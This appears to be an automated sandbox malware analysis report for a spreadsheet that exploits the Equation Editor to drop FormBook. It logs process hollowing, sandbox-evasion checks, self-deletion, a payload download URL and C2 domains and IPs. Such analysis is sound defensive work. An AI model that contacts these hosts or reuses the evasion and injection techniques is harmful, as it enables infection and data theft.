          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$REMITTANCE ADVICE.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDE1E.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/24@4/5
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00402012 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: vbc.exe, 00000004.00000002.466454862.0000000002C60000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.470431447.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.526224259.00000000008A0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.464564394.0000000000430000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.465728410.0000000000590000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.525516222.0000000000720000.00000040.00000001.sdmp, explorer.exe, explorer.exe, 00000007.00000002.670738213.0000000002920000.00000040.00000001.sdmp
          Source: Binary string: explorer.pdb source: vbc.exe, 00000005.00000002.527175937.0000000002980000.00000040.00020000.sdmp, vbc.exe, 00000005.00000003.523078790.00000000023C0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.523696493.00000000026A0000.00000004.00000001.sdmp
          Source: C:\Users\Public\vbc.exeCode function: 4_2_1000FB15 push ecx; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B822 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B82B push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B88C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B7D5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0073DFA1 push ecx; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B7D5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B822 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B82B push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B88C push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027BDFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009B7D5 push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009B82B push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009B822 push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009B88C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsvE542.tmp\otav.dllJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 0000000000088604 second address: 000000000008860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 000000000008899E second address: 00000000000889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2848Thread sleep time: -300000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088D0 rdtsc
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405C22 FindFirstFileA,FindClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00402630 FindFirstFileA,
          Source: explorer.exe, 00000006.00000000.480003695.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.491408805.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.486729602.0000000008374000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0P
          Source: explorer.exe, 00000006.00000000.491408805.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.465457023.00000000005F4000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000006.00000000.467565741.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.491408805.000000000457A000.00000004.00000001.sdmpBinary or memory string: idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech
          Source: explorer.exe, 00000006.00000000.473158769.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\Public\vbc.exeCode function: 4_2_1000E2A9 _memset,IsDebuggerPresent,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_10010D8B EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_10001000 GetProcessHeap,HeapAlloc,CreateFileW,GetProcessHeap,HeapFree,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088D0 rdtsc
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\explorer.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007426F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027C26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B40 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_1000F215 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.yhxt13800.com
          Source: C:\Windows\explorer.exeNetwork Connect: 154.205.233.189 80
          Source: C:\Windows\explorer.exeNetwork Connect: 156.234.44.48 80
          Source: C:\Windows\explorer.exeDomain query: www.ff4cu6twc.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 23.225.139.107 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.promtgloan.com
          Source: C:\Windows\explorer.exeDomain query: www.clicktoreach.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\explorer.exe base address: F20000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1764
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1764
          Source: C:\Windows\SysWOW64\explorer.exeThread register set: target process: 1764
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
          Source: vbc.exe, 00000005.00000002.527175937.0000000002980000.00000040.00020000.sdmp, vbc.exe, 00000005.00000003.523078790.00000000023C0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.523696493.00000000026A0000.00000004.00000001.sdmpBinary or memory string: Proxy DesktopProgmanSoftware\Microsoft\Windows\CurrentVersion\RunOnce
          Source: vbc.exe, 00000005.00000002.527175937.0000000002980000.00000040.00020000.sdmp, vbc.exe, 00000005.00000003.523078790.00000000023C0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.523696493.00000000026A0000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.508092324.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.468666019.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.488027392.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.480164349.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.670498476.0000000001200000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.487883890.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.467436694.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.480003695.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
          Source: explorer.exe, 00000006.00000000.508092324.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.468666019.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.488027392.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.480164349.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.670498476.0000000001200000.00000002.00020000.sdmpBinary or memory string: !Progman
          Source: explorer.exe, 00000006.00000000.508092324.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.468666019.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.488027392.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.480164349.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.670498476.0000000001200000.00000002.00020000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\Public\vbc.exeCode function: 4_2_1000DD84 cpuid
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.vbc.exe.510000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.510000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.525306169.0000000000560000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669495000.0000000000330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.463047286.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669355971.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.463706165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669436738.0000000000270000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.525208793.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.464395143.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.465187885.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.487044128.00000000095A5000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.vbc.exe.510000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.510000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.525306169.0000000000560000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669495000.0000000000330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.463047286.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669355971.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.463706165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669436738.0000000000270000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.525208793.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.464395143.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.465187885.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.487044128.00000000095A5000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery251Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Process Injection612Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Information Discovery114VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 528736 Sample: REMITTANCE ADVICE.xlsx Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 49 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 13 other signatures 2->55 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 33 29 2->15         started        process3 dnsIp4 47 192.210.173.90, 49167, 80 AS-COLOCROSSINGUS United States 10->47 35 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 10->35 dropped 37 C:\Users\Public\vbc.exe, PE32 10->37 dropped 73 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->73 17 vbc.exe 17 10->17         started        39 C:\Users\user\...\~$REMITTANCE ADVICE.xlsx, data 15->39 dropped file5 signatures6 process7 file8 33 C:\Users\user\AppData\Local\Temp\...\otav.dll, PE32 17->33 dropped 57 Tries to detect virtualization through RDTSC time measurements 17->57 59 Injects a PE file into a foreign processes 17->59 21 vbc.exe 17->21         started        signatures9 process10 signatures11 61 Modifies the context of a thread in another process (thread injection) 21->61 63 Maps a DLL or memory area into another process 21->63 65 Sample uses process hollowing technique 21->65 67 Queues an APC in another process (thread injection) 21->67 24 explorer.exe 21->24 injected process12 dnsIp13 41 www.clicktoreach.com 156.234.44.48, 49171, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 24->41 43 www.yhxt13800.com 154.205.233.189, 49169, 80 IKGUL-26484US Seychelles 24->43 45 4 other IPs or domains 24->45 69 System process connects to network (likely due to code injection or exploit) 24->69 71 Performs DNS queries to domains with low reputation 24->71 28 explorer.exe 24->28         started        signatures14 process15 signatures16 75 Modifies the context of a thread in another process (thread injection) 28->75 77 Maps a DLL or memory area into another process 28->77 79 Tries to detect virtualization through RDTSC time measurements 28->79 31 cmd.exe 28->31         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          REMITTANCE ADVICE.xlsx35%VirustotalBrowse
          REMITTANCE ADVICE.xlsx43%ReversingLabsDocument-Office.Exploit.CVE-2017-11882

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsvE542.tmp\otav.dll100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe9%MetadefenderBrowse
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe27%ReversingLabsWin32.Trojan.Generic
          C:\Users\user\AppData\Local\Temp\nsvE542.tmp\otav.dll41%ReversingLabsWin32.Trojan.Generic

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.explorer.exe.2ca796c.7.unpack100%AviraTR/Patched.Ren.GenDownload File
          5.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.vbc.exe.510000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.vbc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.vbc.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File
          5.0.vbc.exe.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.explorer.exe.41b680.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          5.0.vbc.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.1.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://192.210.173.90/70007/vbc.exe100%Avira URL Cloudmalware
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          www.ff4cu6twc.xyz/m07f/100%Avira URL Cloudphishing
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.clicktoreach.com/m07f/?8p=5jRPexjhYVA&8pM=igd9ZaB/0LuNZ3khfd1rv5ythTuTDfiv5fbgroetehOkX6jie/kGfA2Y9msKDFCRQxq0nA==0%Avira URL Cloudsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://java.sun.com0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
